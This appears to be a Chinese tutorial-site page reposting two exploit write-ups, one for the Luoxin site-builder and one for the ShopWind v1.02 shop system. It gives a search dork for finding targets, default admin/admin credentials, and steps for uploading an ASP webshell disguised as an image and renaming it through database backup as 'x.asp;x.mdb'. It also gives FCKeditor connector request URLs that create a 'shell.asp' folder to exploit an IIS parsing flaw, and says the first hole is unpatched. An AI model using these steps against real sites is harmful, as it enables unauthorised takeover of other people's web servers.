ShopWind网店系统与罗信网络建站 v1.02 上传漏洞_漏洞分析教程-查字典教程网
ShopWind网店系统与罗信网络建站 v1.02 上传漏洞
ShopWind网店系统与罗信网络建站 v1.02 上传漏洞
发布时间:2016-12-21 来源:查字典编辑
摘要:罗信网络建站系统oDAY百度orgoogle"技术支持:罗信网络"后台地址:site+lx数据库地址:site+lx+databases+主...

罗信网络建站系统oDAY

百度 or google "技术支持:罗信网络"

后台地址: site+lx

数据库地址: site+lx+databases+主域名.asp(需要猜测)

帐号&密码: admin admin

下来就是拿shell

重要部分: 上传jpg格式的asp马

数据库备份,请注意,这里只能备份后缀为mdb格式的.

那我们怎么备份呢?

还记得之前x.asp;x.jpg格式吗?

对 我们依靠这个 备份格式为: x.asp;x.mdb

OK之后访问我们的备份shell

在线编辑器: site+/lx/edit/admin_login.asp

在线编辑器数据库地址 site/lx/edit/db/%23edit.mdb

注释:官方未修补

====================YD分界线====================

ShopWind网店系统 v1.02 上传漏洞

Author:Lan3a

这个程序用的是FCKeditor 编辑器

利用2003的解析问题。直接说利用方法!

第一步:

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

第二步:

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞分析学习
    热门漏洞分析学习
    网络安全子分类